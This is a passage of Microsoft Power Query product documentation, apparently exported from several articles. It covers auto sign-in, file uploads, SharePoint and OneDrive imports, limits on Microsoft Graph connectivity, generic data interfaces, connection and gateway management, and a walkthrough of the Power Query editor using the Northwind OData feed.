their authentication kinds. It does this auto sign-in to expedite the authentication
process and minimize the time it takes to start working with your data.

More technically, the auto sign-in feature for Azure Active Directory data sources uses
the information derived from the currently authenticated user in the Power Query
Online experience. This information is then used to request a new access token for a
selected data source during the connection settings and authentication steps of the get
data process.

Note

This functionality is currently only available in Power Query Online and is enabled
by default for a select set of connectors. No configuration is needed to enable this
feature.

When selecting a connector that has this capability, it automatically signs you in with
Organizational account set as the authentication kind.
Tip

If you'd like to authenticate with a different account, select the Switch account link
shown in the dialog.

Further reading
Authentication in Power Query Online
Microsoft identity platform and OAuth 2.0 On-Behalf-Of flow
Upload a file (Preview)
Article • 02/17/2023

You can upload files to your Power Query project when using Power Query Online.

The following connectors currently support the upload a file feature.

Excel
JSON
PDF
Text / CSV
XML

Note

Only files with the following extensions are supported for upload: .csv, .json, .pdf,
.prn, .tsv, .txt, .xl, .xls, .xlsb, .xlsm, .xlsw, .xlsx, .xml.

Upload a file experience


When you select a connector that offers the Upload file experience, you will notice a
radio button on the top that enables this feature.
When you select Upload file, the option underneath opens a simple dialog to let you
either drag a file or browse in your local file system to upload a file.

After you've selected your file, a progress bar shows you how the upload process is
going. Once the upload process is finished, you'll be able to see a green check mark
underneath your file name, with the message Upload successful and the file size right
next to it.
Note

The files that are uploaded through this feature are stored in your personal
Microsoft OneDrive for Business account.

Before you select the next button, you need to change the authentication kind from
Anonymous to Organizational account and go through the authentication process.
Start this process by selecting Sign in.

After going through the authentication process, a You are currently signed in message
underneath the Authentication Kind selection lets you know that you've successfully
signed in. After you've signed in, select Next. The file is then stored in your personal
Microsoft OneDrive for Business account, and a new query is created from the file that
you've uploaded.
Drag and drop experience in the query editor
When using the Power Query editor, you can drop a file on either the diagram view or
the queries pane to upload a file.

When dropping the file on either of the previously mentioned sections, a dialog with the
appropriate connector settings page will be shown, based on the file extension of the
file that's being uploaded.
SharePoint and OneDrive for Business files import
Article • 02/17/2023

Power Query offers a series of ways to gain access to files that are hosted on either
SharePoint or OneDrive for Business.

Browse files

Note

Currently, you can only browse for OneDrive for Business files of the authenticated
user inside of Power Query Online for PowerApps.

Warning

This feature requires your browser to allow third party cookies. If your browser has
blocked third party cookies, the Browse dialog will appear but it'll be completely
blank with no option to close the dialog.

Power Query provides a Browse OneDrive button next to the File path or URL text box
when you create a dataflow in PowerApps using any of these connectors:

Excel
JSON
PDF
XML
TXT/CSV
When you select this button, you'll be prompted to go through the authentication
process. After completing this process, a new window appears with all the files inside the
OneDrive for Business of the authenticated user.

You can select the file of your choice, and then select the Open button. After selecting
Open, you'll be taken back to the initial connection settings page where you'll see that
the File path or URL text box now holds the exact URL to the file you've selected from
OneDrive for Business.
You can select the Next button at the bottom-right corner of the window to continue
the process and get your data.

From the Web connector using a file URL


1. Navigate to your OneDrive for Business location using a browser. Right-click the
file you want to use, and select Open in Excel.

Note

Your browser interface might not look exactly like the following image. There
are many ways to select Open in Excel for files in your OneDrive for Business
browser interface. You can use any option that allows you to open the file in
Excel.
2. In Excel, select File > Info, and then select the Copy path button.

To use the link you just copied in Power Query, take the following steps:

1. Select Get Data > Web.


2. In the From Web dialog box, select the Basic option and paste the link in URL.

3. Remove the ?web=1 string at the end of the link so that Power Query can properly
navigate to your file, and then select OK.
4. If Power Query prompts you for credentials, choose either Windows (for on-
premises SharePoint sites) or Organizational Account (for Microsoft 365 or
OneDrive for Business sites). Then select Connect.

Caution

When working with files hosted on OneDrive for Home, the file that you want
to connect to needs to be publicly available. When setting the authentication
method for this connection, select the Anonymous option.

When the Navigator dialog box appears, you can select from the list of tables, sheets,
and ranges found in the Excel workbook. From there, you can use the OneDrive for
Business file just like any other Excel file. You can create reports and use it in datasets
like you would with any other data source.
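As a rough M equivalent of these steps (the file URL below is a made-up OneDrive for Business link with the ?web=1 suffix already removed), the Web connector builds a query along these lines:

let
    // Web.Contents downloads the file; Excel.Workbook interprets the binary as an Excel workbook
    Source = Excel.Workbook(
        Web.Contents("https://contoso-my.sharepoint.com/personal/user123_contoso_com/Documents/Sales.xlsx")
    )
in
    Source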

Note

To use a OneDrive for Business file as a data source in the Power BI service, with
Service Refresh enabled for that file, make sure you select OAuth2 as the
Authentication method when configuring your refresh settings. Otherwise, you
may encounter an error (such as, Failed to update data source credentials) when you
attempt to connect or to refresh. Selecting OAuth2 as the authentication method
remedies that credentials error.

SharePoint folder connector


You can read a detailed step-by-step guide on how to connect to the files hosted on
your SharePoint site in the SharePoint folder article.

After successfully establishing the connection, you'll be prompted with a table preview
that shows the files in your SharePoint site. Select the Transform data button at the
bottom right of the window.

Selecting the Transform Data button will take you to a view of the data called the File
system view. Each of the rows in this table represents a file that was found in your
SharePoint site.

The table has a column named Content that contains your file in a binary format. The
values in the Content column have a different color than the rest of the values in the
other columns of the table, which indicates that they're selectable.

By selecting a Binary value in the Content column, Power Query will automatically add a
series of steps in your query to navigate to the file and interpret its contents where
possible.

For example, from the table shown in the previous image, you can select the second row
where the Name field has a value of 02-February.csv. Power Query will automatically
create a series of steps to navigate and interpret the contents of the file as a CSV file.

Note

You can interact with the table by applying filters, sorting, and other transforms
before navigating to the file of your choice. Once you've finished these transforms,
select the Binary value you want to view.

OneDrive for Business experience


The SharePoint folder connector and its experience also work for files hosted on
OneDrive for Business. However, the URL that you need to use is different from the one
you would use for a SharePoint site. To locate your unique URL, go to your OneDrive for
Business portal and copy the URL from your browser. This URL may look similar to the
following example:

https://contoso-my.sharepoint.com/personal/user123_contoso_com/_layouts/15/onedrive.aspx

You don't need the full URL, but only the first few parts. The URL you need to use in
Power Query will have the following format:

https://<unique_tenant_name>.sharepoint.com/personal/<user_identifier>

For example:
https://contoso-my.sharepoint.com/personal/user123_contoso_com
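A minimal sketch of pointing the SharePoint folder connector's underlying SharePoint.Files function at such a URL (the tenant and user names are placeholders):

let
    // OneDrive for Business URL in the format described above; tenant and user names are placeholders
    Source = SharePoint.Files(
        "https://contoso-my.sharepoint.com/personal/user123_contoso_com",
        [ApiVersion = 15]
    )
in
    Source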

SharePoint.Contents function
While the SharePoint folder connector offers you an experience where you can see all
the files available in your SharePoint or OneDrive for Business site at once, you can also
opt for a different experience. In this experience, you can navigate through your
SharePoint or OneDrive for Business folders and reach the folder or file(s) that you're
interested in.

This experience is provided through the SharePoint.Contents function. Take the
following steps to use this function:

1. Create a Blank Query.

2. Change the code in the formula bar to be SharePoint.Contents("url") where url
is the same format used for the SharePoint folder connector. For example:

SharePoint.Contents("https://contoso.sharepoint.com/marketing/data")

7 Note

By default, this function tries to use SharePoint API Version 14 to connect. If
you aren't certain of the API version being used by your SharePoint site, you
might want to try using the following example code:
SharePoint.Contents("https://contoso.sharepoint.com/marketing/data",
[ApiVersion="Auto"]).

3. Power Query will request that you add an authentication method for your
connection. Use the same authentication method that you'd use for the SharePoint
files connector.

4. Navigate through the different documents to the specific folder or file(s) that
you're interested in.

For example, imagine a SharePoint site with a Shared Documents folder. You can
select the Table value in the Content column for that folder and navigate directly
to that folder.
Inside this Shared Documents folder there's a folder where the company stores all
the sales reports. This folder is named Sales Reports. You can select the Table value
on the Content column for that row.

With all the files inside the Sales Reports folder, you could select the Combine files
button (see Combine files overview) to combine the data from all the files in this
folder to a single table. Or you could navigate directly to a single file of your
choice by selecting the Binary value from the Content column.
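
Expressed in M, the navigation described in these steps looks roughly like the following sketch. The site URL, folder names, and file name are taken from the example above; substitute your own values.

Power Query M

let
    // Connect to the root of the site and list its top-level folders and files
    Source = SharePoint.Contents("https://contoso.sharepoint.com/marketing/data", [ApiVersion = "Auto"]),
    // Drill into folders by selecting the Table value in the Content column
    SharedDocuments = Source{[Name = "Shared Documents"]}[Content],
    SalesReports = SharedDocuments{[Name = "Sales Reports"]}[Content],
    // Navigate to a single file and interpret its contents as a CSV document
    FileContents = SalesReports{[Name = "02-February.csv"]}[Content],
    ImportedCsv = Csv.Document(FileContents)
in
    ImportedCsv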

7 Note

The experience provided by the SharePoint.Contents function is optimal for
SharePoint and OneDrive for Business environments with a large number of files.
Lack of Support for Microsoft Graph in
Power Query
Article • 11/18/2022

Connecting to Microsoft Graph REST APIs from Power Query isn't recommended or
supported. Instead, we recommend users explore alternative solutions for retrieving
analytics data based on Graph, such as Microsoft Graph data connect.

You might find you can make certain REST calls to Microsoft Graph API endpoints work
through the Web.Contents or OData.Feed functions, but these approaches aren't reliable
as long-term solutions.

This article outlines the issues associated with Microsoft Graph connectivity from Power
Query and explains why it isn't recommended.

Authentication
The built-in Organizational Account authentication flow for Power Query's Web.Contents
and OData.Feed functions isn't compatible with most Graph endpoints. Specifically,
Power Query's Azure Active Directory (Azure AD) client requests the user_impersonation
scope, which isn't compatible with Graph's security model. Graph uses a rich set of
permissions that aren't available through our generic Web and OData connectors.

Implementing your own Azure AD credential retrieval flows directly from your query, or
using hardcoded or embedded credentials, also isn't recommended for security reasons.

OData libraries' incompatibility


Certain Graph endpoints and extensions to Graph may require the use of OData libraries
and features that aren't supported by Power Query's built-in OData.Feed function
because Graph and Power Query might be using two different versions of OData
libraries. These issues generally result in errors retrieving the service's $metadata
document. You might discover common guidance related to passing the Implementation
= "2.0" option to the OData.Feed function call to ensure the latest supported OData
libraries are used. While this approach does resolve certain OData incompatibilities, you
might still encounter errors over time as Graph and Power Query adopt new versions of
the OData libraries at different times.
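
For reference, that guidance typically takes a shape similar to the following sketch, where the Graph endpoint is only illustrative. Keep in mind that, as described throughout this article, this pattern isn't supported and shouldn't be relied on as a long-term solution.

Power Query M

let
    // Illustrative only: request the newer OData implementation when reading a Graph endpoint
    Source = OData.Feed(
        "https://graph.microsoft.com/v1.0/users",
        null,
        [Implementation = "2.0"]
    )
in
    Source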
Performance
The Microsoft Graph API is designed to support many application scenarios, but is
suboptimal for the large-scale data retrieval required for most analytics scenarios. If you
try to retrieve large amounts of data from Graph APIs, you might encounter
performance issues. Details around scenario applicability can be found in the Graph
documentation.

Using a custom connector


Some Power Query users have enabled Graph connectivity through custom connectors,
limiting their functionality to certain parts of the Graph API. This approach allows
connector developers to resolve general authentication issues by defining their own
Azure AD client with Graph specific permissions. Some custom connectors work around
OData challenges by using Web.Contents and simulating OData support within their
connector logic. However, this approach isn't recommended as users frequently hit the
performance and scalability issues described above. Developers who take this route
should continue with these limitations in mind.
Alternatives to out-of-box connectivity
in Power BI Desktop
Article • 02/17/2023

While Power BI Desktop offers out-of-box connectivity to over 150 data sources, there
might be cases where you want to connect to a data source for which no out-of-box
connector is available.

Connectivity through generic interfaces


It might be possible to connect to certain data sources without a built-in out-of-box
connector by using generic interface connectors.

For example, the ODBC connector can connect to services with ODBC interfaces, and the
Web connector can connect to services with REST API interfaces.

Using available Power BI out-of-box generic interface connectors to connect through
interfaces that the end data source supports lets you connect to many more data
sources on the internet than there are specific out-of-box connectors for.

To learn more about connectivity through generic interfaces, go to Connect to data
using generic interfaces.

Connectivity through a custom connector


The Power Query SDK lets you create custom connectors to unblock connectivity
scenarios to Power BI Desktop. You can create and distribute custom connectors to end
services and data sources they can authenticate to.

Community members and organizations can also share custom connectors that they've
created. While Microsoft doesn't offer any support, ownership, or guarantees for these
custom connectors, you might be able to use them for your scenarios. The Power BI
Partner Program also includes many partners that can build custom connectors. To learn
more about the program or find a partner, go to Contact a Power BI Partner .

Users that own an end service or data source can create a custom connector and might
be eligible to certify the connector to have it made available publicly out-of-box within
Power BI Desktop.
Request the data source owner to build and
certify a connector
As only the data source owner or an approved third party can build and certify a custom
connector for any service, end users are encouraged to share the demand for a
connector directly with the data source owner to encourage investment into creating
and certifying one.

Request in Power BI Ideas forum


In addition to directly engaging the data source owner, you should also create or vote
on ideas in the Power BI Ideas Forum to demonstrate the need and demand for a
connector. This feedback also helps encourage the data source owner to invest in a
certified connector that's available for users out-of-box in Power BI Desktop.
Connect to data using generic interfaces
Article • 04/06/2023

You can connect to a multitude of different data sources using built-in connectors that
range from Access databases to Zendesk resources. You can also connect to all sorts of
other data sources to further expand your connectivity options, by using the generic
interfaces (such as ODBC or REST APIs) built into Power Query Desktop and Power
Query Online.

Power Query data interfaces


Power Query includes an ever-growing collection of connectors that are built to connect
to a specific data source. For example, the SharePoint list connector provides specific
fields and supporting information during the connection sequence that are designed for
SharePoint lists. Other data sources found in the window that appears when you choose
to get data (in Power Query Desktop) or choose a data source (in Power Query Online)
work in the same way.

In addition, you can also connect to data sources that aren't identified in the get data
and choose data source lists by using one of the following generic data interfaces:

ODBC
OLE DB
OData
REST APIs
R Scripts

By providing the appropriate parameters in the connection windows that these generic
interfaces provide, the world of data sources you can access and use in Power Query
grows significantly.

In the following sections, you can find lists of data sources that can be accessed by
these generic interfaces.

Data sources accessible through ODBC


The ODBC connector in Power Query lets you import data from any third-party ODBC
driver simply by specifying a Data Source Name (DSN) or a connection string. As an
option, you can also specify a SQL statement to execute against the ODBC driver.
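
As a rough illustration, the ODBC interface is exposed in M through the Odbc.DataSource and Odbc.Query functions. The DSN name and SQL statement in the following sketch are hypothetical placeholders.

Power Query M

let
    // Hypothetical DSN and SQL statement; Odbc.DataSource("dsn=MyDsn") could be used instead to browse the catalog
    Source = Odbc.Query("dsn=MyDsn", "SELECT * FROM Sales")
in
    Source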
Data sources accessible through OLE DB
The OLE DB connector in Power Query lets you import data from any third-party OLE DB
driver simply by specifying a connection string. As an option, you can also specify a SQL
statement to execute against the OLE DB driver.
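
Similarly, the OLE DB interface is surfaced in M through the OleDb.DataSource and OleDb.Query functions. The provider and server names in this sketch are hypothetical placeholders.

Power Query M

let
    // Hypothetical OLE DB connection string and SQL statement
    Source = OleDb.Query(
        "provider=MyOleDbProvider;data source=myServer",
        "SELECT * FROM Sales"
    )
in
    Source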
The following list details a few examples of the data sources that Power Query can
connect to using the generic OLE DB interface.

Power Query generic connector External data source Link for more information

OLE DB SAS OLE DB SAS provider for OLE DB

OLE DB Sybase OLE DB Sybase provider for OLE DB

Data sources accessible through OData


The OData feed connector in Power Query lets you import data from any OData URL
simply by typing in or pasting the OData URL. You can add multiple URL parts by typing
or pasting those links in the text boxes provided in the OData feed window.
The following list details a few examples of the data sources that Power Query can
connect to using the generic OData interface.

Power Query generic connector External data source Link for more information

OData Coming soon Check back soon for OData data sources

Data sources accessible through REST APIs


You can connect to data sources using the REST APIs and thereby use data from all sorts
of data sources that support REST.
The following list details a few examples of the data sources that Power BI Desktop can
connect to using the generic REST APIs interface.

Power BI Desktop generic connector External data source Link for more information

REST APIs Couchbase DB Couchbase REST API information
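
Behind the scenes, REST calls in Power Query are typically made with the Web.Contents function, and the response is parsed with a function such as Json.Document. The endpoint in the following sketch is a hypothetical placeholder for whatever REST API you're targeting.

Power Query M

let
    // Hypothetical REST endpoint; Web.Contents returns the raw response as binary
    RawResponse = Web.Contents(
        "https://api.example.com/v1/orders",
        [Headers = [Accept = "application/json"]]
    ),
    // Parse the JSON body into records and lists that Power Query can shape
    Parsed = Json.Document(RawResponse)
in
    Parsed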

Data sources accessible through R Script


You can use R scripts to access data sources, and use that data in Power BI Desktop.
The following list details a few examples of the data sources that Power BI Desktop can
connect to using the generic R scripts interface.

Power BI Desktop generic connector External data source Link for more information

R Script SAS Files R script guidance from CRAN

R Script SPSS Files R script guidance from CRAN

R Script R Statistical Files R script guidance from CRAN


Manage connections (Preview)
Article • 09/18/2023

7 Note

This feature is currently available only in Power Query Online and is in public
preview.

With Power Query, you can connect to a multitude of data sources. When you connect
to a data source, you fundamentally create a connection to it. This connection consists
of your data source, credentials, and more information, such as privacy levels and
optional parameters for each data source. The Manage connections dialog is one
centralized way in your Power Query project to manage the connections that are being
referenced by your project.

The entry to the Manage connections dialog is available in the Power Query Home tab
in the ribbon's Data sources group.

Manage connections displays a list of all connections being referenced in your Power
Query project. It also notes the ability to unlink and edit from any of the connections in
your project.

Unlink a connection
Right next to the name of the connection, and before the Source type column, there's an
icon to unlink the connection.

When you unlink a connection, you're simply removing the reference of the connection
from your project. Unlinking means that the definition of the connection isn't removed
from the back-end, but it can't be used in your project.

A new prompt then asks you to confirm that you want to unlink the connection.

7 Note

If you want to delete a connection from within a specific product integration, such
as Microsoft Power BI or Microsoft Fabric, be sure to check out the documentation
for each product on how a centralized connections portal can be used.

Edit a connection
Right next to the name of the connection, and before the disconnect icon, there's an icon to
edit the connection.

The edit functionality allows you to change the following values:

Data gateway: If your data source uses a data gateway, you can modify the
gateway using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, and fields where you enter your credentials.
More Resources
Get Data experience in Power Query
Connectors available in Power Query
Change the gateway used in a dataflow
project
Article • 05/25/2023

When creating a new dataflow project in Power Query Online, you can select the on-
premises data gateway used for your specific data sources during the get data
experience. This article showcases how you can modify or assign a gateway to an
existing dataflow project.

7 Note

Before being able to change a gateway, make sure that you have the needed
gateways already registered under your tenant and with access for the authors of
the dataflow project. You can learn more about data gateways from Using an on-
premises data gateway in Power Platform dataflows.

Changing the gateway


To showcase how to change the gateway in a dataflow project, this article uses a query
that connects to a local folder as an example.

This query previously used a gateway named "Gateway A" to connect to the folder. But
"Gateway A" no longer has access to the folder due to new company policies. A new
gateway named "Gateway B" has been registered and now has access to the folder that
the query requires. The goal is to change the gateway used in this dataflow project so it
uses the new "Gateway B".

To change the gateway:

1. From the Home tab in Power Query, select Options.


2. In the Options dialog box, select Data load, and then select the gateway to use for
your project, in this case, Gateway B.

 Tip

If there were recent changes to your gateways, select the small refresh icon to
the right of the drop-down menu to update the list of available gateways.
3. After selecting the correct gateway for the project, in this case Gateway B, select
OK to go back to the Power Query editor.

Validate your data source path


After changing your data gateway, we recommend that you check your data source
paths to make sure that your queries are connecting to your data sources as expected.

7 Note

The M engine identifies a data source using a combination of its kind and path.

The kind defines what connector or data source function is being used, such as SQL
Server, folder, Excel workbook, or others.

The path value is derived from the required parameters of your data source
function and, for this example, that would be the folder path.

The best way to validate the data source path is to go into the query where your data
source function is being used and check the parameters being used for it. For this
example, there's only one query that connects to a folder and this query has the Source
step with the data source path defined in it. You can double-click the Source step to get
the dialog that indicates the parameters used for your data source function. Make sure
that the folder path, or the correct parameters for your data source function, is the
correct one in relation to the gateway being used.
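
For instance, the Source step of a query that uses the Folder connector might look like the following sketch in the advanced editor. The folder path shown is a hypothetical placeholder; it represents the data source path that the selected gateway must be able to reach.

Power Query M

let
    // The folder path below is the data source path; it must be reachable by the selected gateway
    Source = Folder.Files("\\fileserver\shared\sales-reports")
in
    Source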

Modify authentication
To modify the credentials used against your data source, select Get data in the Power
Query editor ribbon to launch the Choose data source dialog box, then define a new or
existing connection to your data source. In this example, the connector that's used is the
Folder connector.
Once in Connection settings, create a new connection or select or modify a different
connection for your data source.
After defining the connection details, select Next at the bottom-right corner and
validate that your query is loading in the Power Query editor.

7 Note

This process is the same as if you were to connect again to your data source. But by
doing the process again, you're effectively re-defining what authentication method
and credentials to use against your data source.
The Power Query user interface
Article • 04/10/2023

With Power Query, you can connect to many different data sources and transform the
data into the shape you want.

In this article, you'll learn how to create queries with Power Query by discovering:

How the "Get Data" experience works in Power Query.


How to use and take advantage of the Power Query user interface.
How to perform common transformations like grouping and merging data.

If you're new to Power Query, you can sign up for a free trial of Power BI before you
begin. You can use Power BI dataflows to try out the Power Query Online experiences
described in this article.

You can also download Power BI Desktop for free .

Examples in this article connect to and use the Northwind OData feed .

https://services.odata.org/V4/Northwind/Northwind.svc/

Connect to an OData feed

7 Note

To learn more about where to get data from each of the Microsoft products that
include Power Query, go to Where to get data.

To start, locate the OData feed connector from the "Get Data" experience. You can select
the Other category from the top, or search for OData in the search bar in the top-right
corner.
Once you select this connector, the screen displays the connection settings and
credentials.

For URL, enter the URL to the Northwind OData feed shown in the previous
section.
For On-premises data gateway, leave as none.
For Authentication kind, leave as anonymous.

Select the Next button.

The Navigator now opens, where you select the tables you want to connect to from the
data source. Select the Customers table to load a preview of the data, and then select
Transform data.
The dialog then loads the data from the Customers table into the Power Query editor.

The above experience of connecting to your data, specifying the authentication method,
and selecting the specific object or table to connect to is called the get data experience
and is documented with further detail in the Getting data article.
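
The steps generated by this get data experience correspond, roughly, to an M script like the following sketch. The exact navigation step your host generates may differ slightly.

Power Query M

let
    // Connect to the public Northwind OData feed
    Source = OData.Feed("https://services.odata.org/V4/Northwind/Northwind.svc/"),
    // Navigate to the Customers table selected in the Navigator
    Customers = Source{[Name = "Customers", Signature = "table"]}[Data]
in
    Customers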

7 Note

To learn more about the OData feed connector, go to OData feed.

The Power Query editor user experience


The Power Query editor represents the Power Query user interface, where you can add
or modify queries, manage queries by grouping or adding descriptions to query steps,
or visualize your queries and their structure with different views. The Power Query user
interface has five distinct components.

1. Ribbon: the ribbon navigation experience, which provides multiple tabs to add
transforms, select options for your query, and access different ribbon buttons to
complete various tasks.
2. Queries pane: a view of all your available queries.
3. Current view: your main working view, that by default, displays a preview of the
data for your query. You can also enable the diagram view along with the data
preview view. You can also switch between the schema view and the data preview
view while maintaining the diagram view.
4. Query settings: a view of the currently selected query with relevant information,
such as query name, query steps, and various indicators.
5. Status bar: a bar displaying relevant important information about your query, such
as execution time, total columns and rows, and processing status. This bar also
contains buttons to change your current view.

7 Note

The schema and diagram view are currently only available in Power Query Online.

Using the Power Query editor


In this section, you'll begin transforming your data using Power Query. But before you
start working on transforming the data, we'll discuss some of the UI panes that can be
expanded or collapsed depending on their context. Selecting the appropriate panes lets
you focus on the view that matters the most to you. We'll also discuss the different
views that are available in the Power Query UI.

The ribbon
The ribbon is the component where you'll find most of the transforms and actions that
you can do in the Power Query editor. It has multiple tabs, whose values depend on the
product integration. Each of the tabs provides specific buttons and options, some of
which might be redundant across the whole Power Query experience. These buttons and
options provide you with easy access to the transforms and actions that you may need.

The Power Query interface is responsive and tries to adjust to your screen resolution to
show you the best experience. In scenarios where you'd like to use a compact version of
the ribbon, there's also a collapse button at the bottom-right corner of the ribbon to
help you switch to the compact ribbon.

You can switch back to the standard ribbon view by selecting the expand icon
at the bottom-right corner of the ribbon.

Expand and collapse panes


You'll notice that throughout the Power Query user interface there are icons that help
you collapse or expand certain views or sections. For example, there's an icon on the top
right-hand corner of the Queries pane that collapses the queries pane when selected,
and expands the pane when selected again.

Switch between views


Apart from being able to collapse certain panes and sections in the Power Query user
interface, you can also switch what views are displayed. To switch views, go to the View
tab in the ribbon and you'll find the Preview and Layout groups, which control how the
Power Query user interface will look.

You're encouraged to try all of these options to find the view and layout that you feel
most comfortable working with. As an example, select Schema view from the ribbon.

The right side of the status bar also contains icons for the diagram, data, and schema
views. You can use these icons to change between views. You can also use these icons to
enable or disable the view of your choice.

What is schema view


The schema view offers you a quick and straightforward way to interact only with the
components of the schema for your table, such as the column names and data types.
We recommend the schema view when you want to do schema-related actions, such as
removing columns, renaming columns, changing column data types, reordering
columns, or duplicating columns.

7 Note

To learn more about schema view, go to Using Schema view.

For example, in schema view, select the check mark next to the Orders and
CustomerDemographics columns, and from the ribbon select the Remove columns
action. This selection applies a transformation to remove these columns from your data.

What is diagram view


You can now switch back to the data preview view and enable diagram view to use a
more visual perspective of your data and query.
The diagram view helps you visualize how your query is structured and how it might
interact with other queries in your project. Each step in your query has a distinct icon to
help you recognize the transform that was used. There are also lines that connect steps
to illustrate dependencies. Since both data preview view and diagram view are enabled,
the diagram view displays on top of the data preview.

7 Note

To learn more about diagram view, go to Diagram view.

Begin transforming your data


With diagram view enabled, select the plus sign. You can search for a new transform to
add to your query. Search for Group by and select the transform.
The Group by dialog then appears. You can set the Group by operation to group by the
country and count the number of customer rows per country.

1. Keep the Basic radio button selected.


2. Select Country to group by.
3. Select Customers and Count rows as the column name and operation respectively.

Select OK to perform the operation. Your data preview refreshes to show the total
number of customers by country.
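
Behind the scenes, this Group by operation produces a Table.Group step along the lines of the following sketch. The inline sample rows are made up purely for illustration and stand in for the Customers table.

Power Query M

let
    // Inline sample rows standing in for the Customers table
    Customers = #table({"Country", "CompanyName"}, {{"UK", "Customer A"}, {"UK", "Customer B"}, {"Mexico", "Customer C"}}),
    // Group by Country and count the number of customer rows per country
    Grouped = Table.Group(Customers, {"Country"}, {{"Customers", each Table.RowCount(_), Int64.Type}})
in
    Grouped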

An alternative way to launch the Group by dialog is to use the Group by button
in the ribbon or to right-click the Country column.

For convenience, transforms in Power Query can often be accessed from multiple places,
so users can opt to use the experience they prefer.

Adding a new query


Now that you have a query that provides the number of customers per country, you can
add context to this data by finding the total number of suppliers for each territory.

First, you'll need to add the Suppliers data. Select Get Data and from the drop-down
menu, and then select OData.

The OData connection experience reappears. Enter the connection settings as described
in Connect to an OData feed to connect to the Northwind OData feed. In the Navigator
experience, search for and select the Suppliers table.

Select Create to add the new query to the Power Query editor. The queries pane should
now display both the Customers and the Suppliers query.

Open the Group by dialog again, this time by selecting the Group by button on the
ribbon under the Transform tab.
In the Group by dialog, set the Group by operation to group by the country and count
the number of supplier rows per country.

1. Keep the Basic radio button selected.


2. Select Country to group by.
3. Select Suppliers and Count rows as the column name and operation respectively.

7 Note

To learn more about the Group by transform, go to Grouping or summarizing rows.

Referencing queries
Now that you have a query for customers and a query for suppliers, your next goal is to
combine these queries into one. There are many ways to accomplish this, including
using the Merge option in the Customers table, duplicating a query, or referencing a
query. For this example, you'll create a reference by right-clicking the Customers table
and selecting Reference, which effectively creates a new query that references the
Customers query.

After creating this new query, change the name of the query to Country Analysis and
disable the load of the Customers table by unmarking the Enable load option from the
Suppliers query.

Merging queries
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. In this example, the goal is to join both the Customers
and Suppliers tables into one table only for the countries that have both Customers and
Suppliers.

Inside the Country Analysis query, select the Merge queries option from the Home tab
in the ribbon.

A new dialog for the Merge operation appears. You can then select the query to merge
with your current query. Select the Suppliers query and select the Country field from
both queries. Finally, select the Inner join kind, as you only want the countries where
you have Customers and Suppliers for this analysis.
After selecting the OK button, a new column is added to your Country Analysis query
that contains the data from the Suppliers query. Select the icon next to the Suppliers
field, which displays a menu where you can select which fields you want to expand.
Select only the Suppliers field, and then select the OK button.
The result of this expand operation is a table with only 12 rows. Rename the
Suppliers.Suppliers field to just Suppliers by double-clicking the field name and
entering the new name.
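
In M terms, the merge, expand, and rename described above correspond roughly to the following sketch. The inline sample tables and their values are made up for illustration and stand in for the grouped Customers and Suppliers queries.

Power Query M

let
    // Small inline tables standing in for the grouped Customers and Suppliers queries
    CustomersByCountry = #table({"Country", "Customers"}, {{"UK", 7}, {"France", 11}, {"Spain", 5}}),
    SuppliersByCountry = #table({"Country", "Suppliers"}, {{"UK", 1}, {"France", 3}, {"Italy", 2}}),
    // Inner join on Country keeps only the countries present in both tables
    Merged = Table.NestedJoin(CustomersByCountry, {"Country"}, SuppliersByCountry, {"Country"}, "Suppliers", JoinKind.Inner),
    // Expand only the Suppliers column from the nested table
    Expanded = Table.ExpandTableColumn(Merged, "Suppliers", {"Suppliers"}, {"Suppliers.Suppliers"}),
    // Rename Suppliers.Suppliers to just Suppliers
    Renamed = Table.RenameColumns(Expanded, {{"Suppliers.Suppliers", "Suppliers"}})
in
    Renamed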

7 Note

To learn more about the Merge queries feature, go to Merge queries overview.

Applied steps
Every transformation that is applied to your query is saved as a step in the Applied
steps section of the query settings pane. If you ever need to check how your query is
transformed from step to step, you can select a step and preview how your query
resolves at that specific point.
You can also right-click a step and select the Properties option to change the name of
the step or add a description for the step. For example, right-click the Merge queries
step from the Country Analysis query and change the name of the step to be Merge
with Suppliers and the description to be Getting data from the Suppliers query for
Suppliers by Country.

This change adds a new icon next to your step that you can hover over to read its
description.

7 Note

To learn more about Applied steps, go to Using the Applied Steps list.

Before moving on to the next section, disable the Diagram view to only use the Data
preview.
Adding a new column
With the data for customers and suppliers in a single table, you can now calculate the
ratio of customers-to-suppliers for each country. Select the last step of the Country
Analysis query, and then select both the Customers and Suppliers columns. In the Add
column tab in the ribbon and inside the From number group, select Standard, and then
Divide (Integer) from the dropdown.

This change creates a new column called Integer-division that you can rename to Ratio.
This change is the final step of your query, and provides the customer-to-supplier ratio
for the countries where the data has customers and suppliers.
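
The Divide (Integer) transform adds a step along the lines of the following sketch; the inline sample table is illustrative only, and the generated column name in your query may differ before you rename it.

Power Query M

let
    // Inline sample standing in for the merged Country Analysis table
    CountryAnalysis = #table({"Country", "Customers", "Suppliers"}, {{"UK", 7, 1}, {"France", 11, 3}}),
    // Add the ratio column by integer-dividing Customers by Suppliers
    AddedRatio = Table.AddColumn(CountryAnalysis, "Ratio", each Number.IntegerDivide([Customers], [Suppliers]), Int64.Type)
in
    AddedRatio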

Data profiling
Another Power Query feature that can help you better understand your data is Data
Profiling. By enabling the data profiling features, you'll get feedback about the data
inside your query fields, such as value distribution, column quality, and more.

We recommend that you use this feature throughout the development of your
queries, but you can always enable and disable the feature at your convenience. The
following image shows all the data profiling tools enabled for your Country Analysis
query.
7 Note

To learn more about Data profiling, go to Using the data profiling tools.

The advanced editor


If you want to observe the code that the Power Query editor is creating with each step,
or want to create your own shaping code, you can use the advanced editor. To open the
advanced editor, select the View tab on the ribbon, and then select Advanced Editor. A
window appears, showing the existing query code.
You can directly edit the code in the Advanced Editor window. The editor indicates if
your code is free of syntax errors. To close the window, select the Done or Cancel
button.

Accessing Power Query help


There are various levels of help that can be accessed in the Microsoft apps that use
Power Query. This section describes these help levels.

Power Query help in Excel


There are a couple of ways to access Power Query help information that specifically
applies to Power Query in Excel. One way to access the online Excel Power Query
documentation is to select File > Help > Help in the Power Query editor.

To access the inline Power Query help information in Excel, select the Help tab on the
Excel ribbon, and then enter Power Query in the search text box.

Power Query help in Power BI Desktop


There's a Help tab in the Power Query editor running on Power BI Desktop, but at this
time all of the options go to locations that supply Power BI information. You can also
reach this same Power BI Help information in the Power Query editor in Power BI
Desktop by selecting File > Help, and then selecting one of the help options.

Power Query help in Power BI service, Power Apps,


Customer Insights, and Azure Data Factory
The Power Query Help tab in Power BI service, Power Apps, Dynamics 365 Customer
